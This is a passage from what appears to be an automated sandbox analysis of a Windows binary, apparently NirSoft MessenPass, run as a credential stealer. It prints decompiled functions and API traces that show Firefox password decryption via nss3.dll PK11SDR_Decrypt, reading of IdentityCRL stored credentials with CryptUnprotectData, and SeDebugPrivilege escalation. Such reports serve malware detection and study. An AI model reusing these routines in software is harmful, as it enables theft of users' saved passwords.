						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
						_a4 = _a4 + 1;
						_t92 = _t92 + 1;
					} while (_t92 < _v32);
				}
				return _t91;
			}









































                                0x00407c8a
                                0x00407c95
                                0x00407c99
                                0x00407c9d
                                0x00407ca1
                                0x00407ca5
                                0x00407ca9
                                0x00407cad
                                0x00407cb1
                                0x00407cb5
                                0x00407cb9
                                0x00407cbd
                                0x00407cc1
                                0x00407cc5
                                0x00407cc9
                                0x00407ccd
                                0x00407cd1
                                0x00407cd5
                                0x00407cdb
                                0x00407ce9
                                0x00407cef
                                0x00407d02
                                0x00407d09
                                0x00407d17
                                0x00407d1e
                                0x00407d29
                                0x00407d3a
                                0x00407d3d
                                0x00407d40
                                0x00407d51
                                0x00407d54
                                0x00407d73
                                0x00407d88
                                0x00407d96
                                0x00407da0
                                0x00407da5
                                0x00407da8
                                0x00407db2
                                0x00407dbd
                                0x00407dc2
                                0x00407dc4
                                0x00407dca
                                0x00407dcd
                                0x00407dd3
                                0x00407dd9
                                0x00407dd9
                                0x00407ddd
                                0x00407de0
                                0x00407de9
                                0x00407deb
                                0x00407df2
                                0x00407df3
                                0x00407dca
                                0x00407dfb
                                0x00407dfd
                                0x00407e00
                                0x00407e06
                                0x00407e0c
                                0x00407e0c
                                0x00407e15
                                0x00407e18
                                0x00407e21
                                0x00407e23
                                0x00407e26
                                0x00407e27
                                0x00407dfd
                                0x00407e30

                                APIs
                                • memset.MSVCRT ref: 00407CDB
                                • memset.MSVCRT ref: 00407CEF
                                • memset.MSVCRT ref: 00407D09
                                • memset.MSVCRT ref: 00407D1E
                                • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                • strlen.MSVCRT ref: 00407D91
                                • strlen.MSVCRT ref: 00407DA0
                                • memcpy.MSVCRT ref: 00407DB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                • String ID: 5$H$O$b$i$}$}
                                • API String ID: 1832431107-3760989150
                                • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410DE1, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00410DF0
                                  • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0
                                • GetLastError.KERNEL32(00000000), ref: 00410E02
                                • GetProcAddress.KERNEL32(?,LookupPrivilegeValueA), ref: 00410E24
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?,?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E34
                                • GetProcAddress.KERNEL32(?,AdjustTokenPrivileges), ref: 00410E5A
                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E6B
                                • FindCloseChangeNotification.KERNELBASE(?,?,?,00000000), ref: 00410E78
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$AdjustChangeCloseCurrentErrorFindLastLookupNotificationPrivilegePrivilegesProcessTokenValue
                                • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeDebugPrivilege
                                • API String ID: 2949824235-164648368
                                • Opcode ID: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                • Instruction ID: 180035a187f8386c87a779d0175683d60653c8262eee481a5a772ffe12dd7b09
                                • Opcode Fuzzy Hash: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                • Instruction Fuzzy Hash: D2117371900205FBDB11ABE5DC85AEF7BBCEB48344F10442AF501E2151DBB99DC18BA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407898, Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00407898(void** __eax) {
				void* __esi;
				void* _t15;
				int _t16;
				int _t17;
				void* _t26;
				void** _t38;
				void** _t40;
				void* _t45;

				_t40 = __eax;
				_t15 =  *__eax;
				if(_t15 != 0xffffffff) {
					_t6 =  &(_t40[0x52]); // 0x247
					_t16 = FindNextFileA(_t15, _t6); // executed
					 *(_t45 + 4) = _t16;
					if(_t16 != 0) {
						goto L5;
					} else {
						E00407930(_t40);
						goto L4;
					}
				} else {
					_t1 =  &(_t40[0x52]); // 0x247
					_t2 =  &(_t40[1]); // 0x103
					_t26 = FindFirstFileA(_t2, _t1); // executed
					 *_t40 = _t26;
					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
					L4:
					if( *(_t45 + 4) != 0) {
						L5:
						_t9 =  &(_t40[0xa2]); // 0x387
						_t38 = _t9;
						_t10 =  &(_t40[0x5d]); // 0x273
						_t28 = _t10;
						_t41 =  &(_t40[0xf3]);
						_t17 = strlen( &(_t40[0xf3]));
						if(strlen(_t10) + _t17 + 1 >= 0x143) {
							 *_t38 = 0;
						} else {
							E00406B4B(_t38, _t41, _t28);
						}
					}
				}
				return  *(_t45 + 4);
			}











                                0x0040789a
                                0x0040789c
                                0x004078a1
                                0x004078c4
                                0x004078cc
                                0x004078d4
                                0x004078d8
                                0x00000000
                                0x004078da
                                0x004078da
                                0x00000000
                                0x004078da
                                0x004078a3
                                0x004078a3
                                0x004078aa
                                0x004078ae
                                0x004078bc
                                0x004078be
                                0x004078df
                                0x004078e4
                                0x004078e6
                                0x004078e9
                                0x004078e9
                                0x004078ef
                                0x004078ef
                                0x004078f5
                                0x004078fc
                                0x00407914
                                0x00407923
                                0x00407916
                                0x0040791a
                                0x00407920
                                0x00407928
                                0x004078e4
                                0x0040792f

                                APIs
                                • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
                                • strlen.MSVCRT ref: 004078FC
                                • strlen.MSVCRT ref: 00407904
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileFindstrlen$FirstNext
                                • String ID:
                                • API String ID: 379999529-0
                                • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
                                • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C66A, Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 185windowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E0040C66A(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t56;
				struct HINSTANCE__* _t59;
				void* _t61;
				void* _t65;
				void* _t67;
				void* _t73;
				void* _t83;
				void* _t86;
				void* _t88;
				intOrPtr _t89;
				void* _t91;
				void* _t96;
				void* _t97;
				void* _t111;
				struct HWND__* _t112;
				intOrPtr* _t123;
				void* _t124;
				void* _t126;

				_t124 = _t126 - 0x68;
				 *0x41dbd4 =  *(_t124 + 0x70);
				_t56 = E00404D7A(__ecx);
				if(_t56 != 0) {
					0x412192(_t111);
					_t112 = 0;
					 *(_t124 + 0x70) = 0;
					0x410de1(); // executed
					__eflags =  *(_t124 + 0x70);
					if( *(_t124 + 0x70) != 0) {
						FreeLibrary( *(_t124 + 0x70));
					}
					 *0x41e150 = 0x11223344; // executed
					EnumResourceTypesA( *0x41dbd4, 0x412111, _t112);
					_t59 =  *0x41e150; // 0xe17b5ca0
					__eflags = _t59 - 0xe17b5ca0;
					 *(_t124 + 0x70) = _t59;
					if(_t59 == 0xe17b5ca0) {
						_t61 = E0040731C(_t124 + 0x34);
						 *((intOrPtr*)(_t124 + 0x5c)) = 0x20;
						 *(_t124 + 0x54) = _t112;
						 *(_t124 + 0x60) = _t112;
						 *(_t124 + 0x58) = _t112;
						 *(_t124 + 0x64) = _t112;
						E0040C427(_t61, _t124 - 0x384);
						 *((intOrPtr*)(_t124 + 0x14)) = _t124 + 0x34;
						E0040763D(__eflags, _t124 + 0x34,  *((intOrPtr*)(_t124 + 0x78)));
						_t65 = E004077AF( *((intOrPtr*)(_t124 + 0x14)), "/savelangfile", 0xffffffff);
						__eflags = _t65;
						if(_t65 < 0) {
							E0040902B(); // executed
							_t67 = E004077AF( *((intOrPtr*)(_t124 + 0x14)), "/deleteregkey", 0xffffffff);
							__eflags = _t67;
							if(_t67 < 0) {
								__eflags =  *(_t124 + 0x70) + 0x1e84a361 - 1;
								if( *(_t124 + 0x70) + 0x1e84a361 != 1) {
									L28:
									 *((intOrPtr*)(_t124 - 0x384)) = 0x418778;
									0x413d56( *((intOrPtr*)(_t124 + 8)));
									__eflags =  *(_t124 + 4) - _t112;
									if( *(_t124 + 4) != _t112) {
										DeleteObject( *(_t124 + 4));
										 *(_t124 + 4) = _t112;
									}
									L30:
									 *((intOrPtr*)(_t124 - 0x384)) = 0x417d40;
									E0040733E(_t124 + 0x34);
									E00407A7A(_t124 + 0x54);
									E0040733E(_t124 + 0x34);
									L31:
									_t73 = 0;
									__eflags = 0;
									goto L32;
								}
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + 0x30)) - 1;
								if(__eflags <= 0) {
									L16:
									 *0x415394(_t112);
									E0040C3AF(_t124 - 0x384);
									__eflags =  *((intOrPtr*)(_t124 - 0x238)) - 3;
									if( *((intOrPtr*)(_t124 - 0x238)) != 3) {
										_push(5);
									} else {
										_push(3);
									}
									ShowWindow( *(_t124 - 0x27c), ??);
									UpdateWindow( *(_t124 - 0x27c));
									 *((intOrPtr*)(_t124 - 0x264)) = LoadAcceleratorsA( *0x41dbd4, 0x67);
									PostMessageA( *(_t124 - 0x27c), 0x415, _t112, _t112);
									_t83 = GetMessageA(_t124 + 0x18, _t112, _t112, _t112);
									__eflags = _t83;
									if(_t83 == 0) {
										L27:
										 *0x415398();
										goto L28;
									} else {
										_t123 =  *0x415184;
										do {
											_t86 =  *0x415208( *(_t124 - 0x27c),  *((intOrPtr*)(_t124 - 0x264)), _t124 + 0x18);
											__eflags = _t86;
											if(_t86 != 0) {
												goto L26;
											}
											_t89 =  *0x41e1f4; // 0x0
											__eflags = _t89 - _t112;
											if(_t89 == _t112) {
												L24:
												_t91 =  *_t123( *(_t124 - 0x27c), _t124 + 0x18);
												__eflags = _t91;
												if(_t91 == 0) {
													TranslateMessage(_t124 + 0x18);
													DispatchMessageA(_t124 + 0x18);
												}
												goto L26;
											}
											_t96 =  *_t123(_t89, _t124 + 0x18);
											__eflags = _t96;
											if(_t96 != 0) {
												goto L26;
											}
											goto L24;
											L26:
											_t88 = GetMessageA(_t124 + 0x18, _t112, _t112, _t112);
											__eflags = _t88;
										} while (_t88 != 0);
										goto L27;
									}
								}
								_t97 = E0040C5A4(_t124 - 0x384, __eflags);
								__eflags = _t97;
								if(_t97 == 0) {
									_t112 = 0;
									__eflags = 0;
									goto L16;
								}
								 *((intOrPtr*)(_t124 - 0x384)) = 0x418778;
								0x413d56( *((intOrPtr*)(_t124 + 8)));
								__eflags =  *(_t124 + 4);
								if( *(_t124 + 4) != 0) {
									DeleteObject( *(_t124 + 4));
									 *(_t124 + 4) =  *(_t124 + 4) & 0x00000000;
								}
								goto L30;
							}
							RegDeleteKeyA(0x80000001, "Software\NirSoft\MessenPass");
							goto L28;
						}
						 *0x41e390 = 0x41db18;
						E00409167();
						goto L28;
					}
					MessageBoxA(_t112, "Failed to load the executable file !", "Error", 0x30);
					goto L31;
				} else {
					_t73 = _t56 + 1;
					L32:
					return _t73;
				}
			}
























                                0x0040c66b
                                0x0040c678
                                0x0040c67d
                                0x0040c684
                                0x0040c68d
                                0x0040c692
                                0x0040c697
                                0x0040c69a
                                0x0040c69f
                                0x0040c6a2
                                0x0040c6a7
                                0x0040c6a7
                                0x0040c6b9
                                0x0040c6c3
                                0x0040c6c9
                                0x0040c6ce
                                0x0040c6d3
                                0x0040c6d6
                                0x0040c6f5
                                0x0040c700
                                0x0040c707
                                0x0040c70a
                                0x0040c70d
                                0x0040c710
                                0x0040c713
                                0x0040c71f
                                0x0040c722
                                0x0040c731
                                0x0040c736
                                0x0040c738
                                0x0040c74e
                                0x0040c75d
                                0x0040c762
                                0x0040c764
                                0x0040c783
                                0x0040c786
                                0x0040c8b3
                                0x0040c8b6
                                0x0040c8c0
                                0x0040c8c5
                                0x0040c8c9
                                0x0040c8ce
                                0x0040c8d4
                                0x0040c8d4
                                0x0040c8d7
                                0x0040c8da
                                0x0040c8e4
                                0x0040c8ec
                                0x0040c8f4
                                0x0040c8fb
                                0x0040c8fb
                                0x0040c8fb
                                0x00000000
                                0x0040c8fd
                                0x0040c78f
                                0x0040c793
                                0x0040c7d5
                                0x0040c7d6
                                0x0040c7e2
                                0x0040c7e7
                                0x0040c7ee
                                0x0040c7f4
                                0x0040c7f0
                                0x0040c7f0
                                0x0040c7f0
                                0x0040c7fc
                                0x0040c808
                                0x0040c829
                                0x0040c82f
                                0x0040c842
                                0x0040c844
                                0x0040c846
                                0x0040c8ad
                                0x0040c8ad
                                0x00000000
                                0x0040c848
                                0x0040c848
                                0x0040c84e
                                0x0040c85e
                                0x0040c864
                                0x0040c866
                                0x00000000
                                0x00000000
                                0x0040c868
                                0x0040c86d
                                0x0040c86f
                                0x0040c87c
                                0x0040c886
                                0x0040c888
                                0x0040c88a
                                0x0040c890
                                0x0040c89a
                                0x0040c89a
                                0x00000000
                                0x0040c88a
                                0x0040c876
                                0x0040c878
                                0x0040c87a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0040c8a0
                                0x0040c8a7
                                0x0040c8a9
                                0x0040c8a9
                                0x00000000
                                0x0040c84e
                                0x0040c846
                                0x0040c79b
                                0x0040c7a0
                                0x0040c7a2
                                0x0040c7d3
                                0x0040c7d3
                                0x00000000
                                0x0040c7d3
                                0x0040c7a7
                                0x0040c7b1
                                0x0040c7b6
                                0x0040c7bb
                                0x0040c7c4
                                0x0040c7ca
                                0x0040c7ca
                                0x00000000
                                0x0040c7bb
                                0x0040c770
                                0x00000000
                                0x0040c770
                                0x0040c73a
                                0x0040c744
                                0x00000000
                                0x0040c744
                                0x0040c6e5
                                0x00000000
                                0x0040c686
                                0x0040c686
                                0x0040c8fe
                                0x0040c902
                                0x0040c902

                                APIs
                                  • Part of subcall function 00404D7A: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                  • Part of subcall function 00404D7A: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
                                  • Part of subcall function 00404D7A: FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                  • Part of subcall function 00404D7A: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                • FreeLibrary.KERNEL32(?), ref: 0040C6A7
                                • EnumResourceTypesA.KERNEL32(00412111,00000000), ref: 0040C6C3
                                • MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040C6E5
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Library$FreeMessage$AddressEnumLoadProcResourceTypes
                                • String ID: /deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MessenPass$f-@
                                • API String ID: 1343656639-3807849023
                                • Opcode ID: 963b88b9f9c69f281e14da51def9a8da2922e77b5a2540e53fd8c7e58f6c6b2e
                                • Instruction ID: c9cf7fae9a68988a057e6d0076c0e2abe6ed6f3ff992c821ff985c928f871611
                                • Opcode Fuzzy Hash: 963b88b9f9c69f281e14da51def9a8da2922e77b5a2540e53fd8c7e58f6c6b2e
                                • Instruction Fuzzy Hash: 7661917190420AEBDF21AF61DD89ADE3BB8BF84305F10817BF905A21A0DB389945DF5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00405EC5, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 161registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00405EC5(CHAR* _a4) {
				void* _v8;
				int _v12;
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void _v787;
				char _v788;
				void _v1051;
				char _v1052;
				void _v2075;
				char _v2076;
				void** _t44;
				void* _t49;
				void* _t51;
				char* _t54;
				char* _t55;
				char* _t63;
				char* _t67;
				CHAR* _t79;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;

				_v1052 = 0;
				memset( &_v1051, 0, 0x104);
				_v788 = 0;
				memset( &_v787, 0, 0xff);
				_t79 = _a4;
				_t44 =  &_v8;
				 *_t79 = 0;
				0x411d68(0x80000002, "SOFTWARE\Mozilla", _t44);
				_t83 = _t82 + 0x24;
				if(_t44 != 0) {
					L13:
					0x413d0c(_t79,  &_v1052);
					if( *_t79 == 0) {
						ExpandEnvironmentStringsA("%programfiles%\Mozilla Firefox", _t79, 0x104);
						_t49 = E00405E4A(_t79); // executed
						if(_t49 == 0) {
							 *_t79 = 0;
						}
						if( *_t79 == 0) {
							GetCurrentDirectoryA(0x104, _t79);
							_t51 = E00405E4A(_t79); // executed
							if(_t51 == 0) {
								 *_t79 = 0;
							}
						}
					}
					return 0 |  *_t79 != 0x00000000;
				} else {
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					_t54 =  &_v268;
					_v12 = 0;
					0x411dee(_v8, 0, _t54);
					_t84 = _t83 + 0x18;
					while(_t54 == 0) {
						_t55 =  &_v268;
						0x413daa(_t55, "mozilla", 7);
						_t85 = _t84 + 0xc;
						if(_t55 != 0) {
							L10:
							_v12 = _v12 + 1;
							_t54 =  &_v268;
							0x411dee(_v8, _v12, _t54);
							_t84 = _t85 + 0xc;
							continue;
						}
						_v532 = 0;
						memset( &_v531, 0, 0x104);
						_v2076 = 0;
						memset( &_v2075, 0, 0x3ff);
						0x413d9e( &_v2076, 0x3ff, "%s\bin",  &_v268);
						0x411dae(_v8,  &_v2076, "PathToExe", 0x104);
						_t63 =  &_v532;
						0x413da4(_t63, 0x5c);
						_t85 = _t85 + 0x40;
						if(_t63 != 0) {
							 *_t63 = 0;
						}
						if(_v532 != 0 && E00405E4A( &_v532) != 0) {
							_t67 =  &_v268;
							0x413d74(_t67,  &_v788);
							if(_t67 > 0) {
								0x413d0c( &_v1052,  &_v532);
								0x413d0c( &_v788,  &_v268);
								_t85 = _t85 + 0x10;
							}
						}
						_t79 = _a4;
						goto L10;
					}
					RegCloseKey(_v8);
					goto L13;
				}
			}



























                                0x00405ee1
                                0x00405ee7
                                0x00405ef9
                                0x00405eff
                                0x00405f04
                                0x00405f07
                                0x00405f15
                                0x00405f17
                                0x00405f1c
                                0x00405f21
                                0x00406072
                                0x0040607a
                                0x00406083
                                0x0040608c
                                0x00406093
                                0x0040609a
                                0x0040609c
                                0x0040609c
                                0x004060a0
                                0x004060a4
                                0x004060ab
                                0x004060b2
                                0x004060b4
                                0x004060b4
                                0x004060b2
                                0x004060a0
                                0x004060c1
                                0x00405f27
                                0x00405f34
                                0x00405f3a
                                0x00405f3f
                                0x00405f4a
                                0x00405f4d
                                0x00405f52
                                0x00406061
                                0x00405f5c
                                0x00405f68
                                0x00405f6d
                                0x00405f72
                                0x00406049
                                0x00406049
                                0x0040604c
                                0x00406059
                                0x0040605e
                                0x00000000
                                0x0040605e
                                0x00405f81
                                0x00405f87
                                0x00405f9a
                                0x00405fa0
                                0x00405fb9
                                0x00405fd4
                                0x00405fd9
                                0x00405fde
                                0x00405fe3
                                0x00405fe8
                                0x00405fea
                                0x00405fea
                                0x00405ff2
                                0x0040600b
                                0x00406012
                                0x0040601b
                                0x0040602b
                                0x0040603e
                                0x00406043
                                0x00406043
                                0x0040601b
                                0x00406046
                                0x00000000
                                0x00406046
                                0x0040606c
                                0x00000000
                                0x0040606c

                                APIs
                                • memset.MSVCRT ref: 00405EE7
                                • memset.MSVCRT ref: 00405EFF
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • memset.MSVCRT ref: 00405F3A
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • _mbsnbicmp.MSVCRT ref: 00405F68
                                • memset.MSVCRT ref: 00405F87
                                • memset.MSVCRT ref: 00405FA0
                                • _snprintf.MSVCRT ref: 00405FB9
                                • _mbsrchr.MSVCRT ref: 00405FDE
                                • _mbsicmp.MSVCRT ref: 00406012
                                • _mbscpy.MSVCRT ref: 0040602B
                                • _mbscpy.MSVCRT ref: 0040603E
                                • RegCloseKey.ADVAPI32(?), ref: 0040606C
                                • _mbscpy.MSVCRT ref: 0040607A
                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$_mbscpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                • API String ID: 201549630-2797892316
                                • Opcode ID: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
                                • Instruction ID: a9db27f8d3bb6867008f3f8c7ab71477537d255c6bc9b4b6a3b98ebc98dd088a
                                • Opcode Fuzzy Hash: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
                                • Instruction Fuzzy Hash: 8F51B7B184015DBADB21DB619C86EDF7BBC9F15304F0004FAB548E2142EA789FC58BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410C4C, Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 93libraryloaderstringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00410C6D
                                  • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                  • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                  • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                  • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                  • Part of subcall function 00405EC5: _mbscpy.MSVCRT ref: 0040607A
                                  • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                  • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                • SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
                                • memset.MSVCRT ref: 00410CB4
                                • strlen.MSVCRT ref: 00410CBE
                                • strlen.MSVCRT ref: 00410CCC
                                • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
                                • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                • API String ID: 2719586705-3659000792
                                • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004110AF, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNELBASE(psapi.dll,?,00411155,00404495,00000000,00000000,00000000), ref: 004110C2
                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 004110DB
                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004110EC
                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 004110FD
                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041110E
                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0041111F
                                • FreeLibrary.KERNEL32(00000000), ref: 0041113F
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$Library$FreeLoad
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                • API String ID: 2449869053-232097475
                                • Opcode ID: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
                                • Instruction ID: 150d9d7abe9eb73bde655d9ea944b9d4c8ac0ad9fe74c99b0592c1ab8213f4a8
                                • Opcode Fuzzy Hash: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
                                • Instruction Fuzzy Hash: CA01B138941212FAC7209F26AD04BE77EE4578CB94F14803BEA04D1669EB7884828A6C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004103F1, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 99registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,75D6F420,00000000,?,0040DCC1,?), ref: 0041041E
                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,75D6F420,00000000,?,0040DCC1,?), ref: 00410436
                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,75D6F420,00000000,?,0040DCC1), ref: 0041045F
                                • RegCloseKey.ADVAPI32(?,?,75D6F420,00000000,?,0040DCC1), ref: 00410509
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                • memcpy.MSVCRT ref: 004104C8
                                • memcpy.MSVCRT ref: 004104DD
                                  • Part of subcall function 004100A4: RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,?,?,004104FD,?,?,?,?), ref: 004100C8
                                  • Part of subcall function 004100A4: memset.MSVCRT ref: 004100EA
